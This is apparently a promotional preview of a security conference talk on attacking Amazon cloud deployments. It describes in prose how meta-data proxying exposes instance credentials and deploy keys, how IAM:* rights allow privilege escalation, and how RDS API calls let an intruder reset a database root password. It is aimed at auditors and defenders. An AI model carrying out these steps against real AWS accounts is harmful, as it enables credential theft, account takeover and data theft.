The „cloud“ infrastructure is a crucial part of information technology. Many companies take advantage of outsourced computing and storage resources. Due to many vendors offering a multitude of services, the term „cloud“ is often ill-defined and misunderstood. This is a problem if your IT security staff needs to inspect and configure your „cloud“ deployment with regards to security. Of course, virtualisation technology can be hardened, too. However the „cloud“ infrastructure brings its own features into the game. This is where things get interesting and where you have to broaden your horizon. Andres Riancho will show you in his talk Pivoting In Amazon Clouds what pitfalls you can expect when deploying code and data in the Amazon Cloud.
Classical security tests won’t be enough. The Amazon Elastic Compute Cloud (EC2) is more than just virtual iron. You also get to think about instance life cycles (remember that virtual systems are very volatile), (user) data, AWS Identity and Access management (IAM) roles, and more “meta stuff” attached to your AWS infrastructure. What else is there? Let’s give you some in-depth information from Andres’ talk.
EC2 Instance Meta-Data
All EC2 instances have meta-data, such as the used Amazon Machine Images (AMI), kernel and region. This meta-data is made available to the instance through a web server (only accessible to that particular instance) which lives at http://169.254.169.254/. Amazon’s meta-data documentation better explains all the details about the instance meta-data and how to access it. From the information security perspective the important information available in the meta-data is:
- local IP address
- user data
- instance profile (AWS API credentials as explained later)
- Amazon Machine Image (AMI)
When creating a new EC2 instance, or defining a launch configuration which will be used together with auto scaling groups, the AWS administrator can provide a script which will be run by the EC2 instance operating system as one of the last boot steps. This script, also called user data, is stored by AWS in the instance meta data and retrieved by the OS during boot. In Ubuntu the cloudinit daemon is responsible from retrieving and running this script.
User data scripts are a common way to configure EC2 instances. They install base packages, git client, define variables (for source repositories, etc.), download application source code, compile code, or start required daemon processes. Since in most cases the repository where the instance’s application source code is private, SSH keys are used to access it. GitHub, BitBucket and other widely used source repositories call these “Deploy SSH Keys”. The SSH keys used to access the repository are usually hard-coded into the user data script, or stored in an alternate location where the script can download them.
This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance which allows him to retrieve the user data script from the meta data. In other words, if there is a way for the attacker to ask any of the services running on the instance to perform an HTTP GET request to arbitrary URLs and then return the HTTP response body to the attacker, then he would get access to the repository URL, branch and SSH keys allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include but any other vulnerable software which allows HTTP proxying could be used to retrieve the meta-data too.
It is common practice for applications running on EC2 instances to access AWS services like SQS or S3. In order for this to work the application needs to have access to AWS credentials, there are various ways to achieve this, but Amazon AWS recommends using instance profiles.
Instance profiles are defined by the AWS architect, who defines which permissions will be available to the EC2 instances using the profile. For example, it is possible to create an instance profile with “SQS:*” permissions which would allow access to all API calls in the SQS service.
Once created, the instance profile is associated with an EC2 instance or a launch configuration. When the instances are started AWS creates a unique set of access key, a secret key, and security token and makes them available to the instance through its meta data. Most libraries which consume AWS services, such as boto, know how to retrieve the meta data credentials and use them to access the AWS services.
Since the instance profile credentials are stored in the meta-data, it suffers from the same risks as any other information stored there. Once those credentials are retrieved from the instance, it is possible to use them in any other system with Internet access. The permissions available to the attacker using the stolen credentials will be the same as the AWS EC2 instance, making it very important for the AWS administrator to use the least privilege principle for all AWS permissions. It is also possible to enumerate permissions by use of the nimbostratus tool introduced by Andres.
IAM:* Privilege Escalation
Amazon’s IAM service is used to manage users, groups, roles and permissions. The permissions assigned to a group or user are fine grained and are usually created using Amazon’s IAM policy generator and then set using Amazon’s IAM service. An Amazon architect can create a custom permission set which would allow access to the different AWS services such as SQS, RDS, EC2 and IAM itself.
If special care is not taken by the AWS architect when assigning IAM permissions to a user, he could use IAM API calls to elevate his privileges. Take a look at this example.
- AWS user Alice only has privileges to access IAM API calls, IAM:* for short
- Alice uses those privileges to create a new user: Bob
- Alice creates a new role with permissions to access all AWS services
- Alice assigns the newly created role to Bob
- Alice creates access keys for the user Bob
- Alice accesses any AWS service using Bob’s user
To run this attack Alice requires at least these IAM permissions:
It is important to notice that it would be also possible to achieve the same goal using other calls to the IAM service, for example it is possible to create a group, assign the policy to that group and then make the newly created user part of the group; or even make Alice part of the new group with high privileges.
Using AWS to access Virtualized Database Information
One of the most popular services provided by Amazon is RDS, which provides managed SQL databases. RDS reduces the management required by database servers and makes scaling and high availability easy to achieve.
SQL databases started from RDS can be managed using two very distinct methods:
- SQL database root user, connecting to the SQL server port (ie. 3306 in MySQL)
- Amazon’s RDS API, sending HTTPS requests to the RDS API endpoint
Each method allows the user to perform different actions on the database, information and users. Now imagine the following situation:
- An intruder got access to a set of AWS credentials.
- The credentials have permissions to access RDS:*.
- The intruder has no other knowledge nor access to the SQL DB running on RDS.
Any knowledgeable intruder will identify three API calls which could be used to access the information stored in SQL databases managed by RDS: CreateDBSnapshot, RestoreDBInstanceFromDBSnapshot and ModifyDBInstance. The steps are trivial:
- Use CreateDBSnapshot to create a backup of the RDS instance we want to get access to.
- Use RestoreDBInstanceFromDBSnapshot to create a new RDS instance with all the information from the original one.
- When the instance is running we’ll still won’t be able to access it using the SQL server port, since we don’t have valid credentials for that. To solve that we call ModifyDBInstance, which will change the “root” user’s password.
- Using a SQL client (ie. mysqlclient in Ubuntu) the intruder can connect to the DB using the “root” user and the credentials set in ModifyDBInstance.
Please note that an intruder could also have called ModifyDBInstance on an existing RDS instance and change the “root” password, which could be highly destructive and create a denial of service if the root user is used to access the SQL database from within the application, but also will grant him “root” account access to the SQL server.
Andres Riancho will present tools created during his research. These tools allow you to help with the enumeration and exploitation of AWS misconfigurations (which is just another way of saying audit).
Who should attend?
Anyone seriously working with or considering Amazon Web Services (or any other kind of „Cloud“ infrastructure) has to attend this talk! The „Cloud“ is more than just virtualisation. You have to deal with the additional APIs and details it brings with it. The concepts discussed in this configuration are especially important for penetration testers and auditors who attackinvestigate „Cloud“ infrastructure.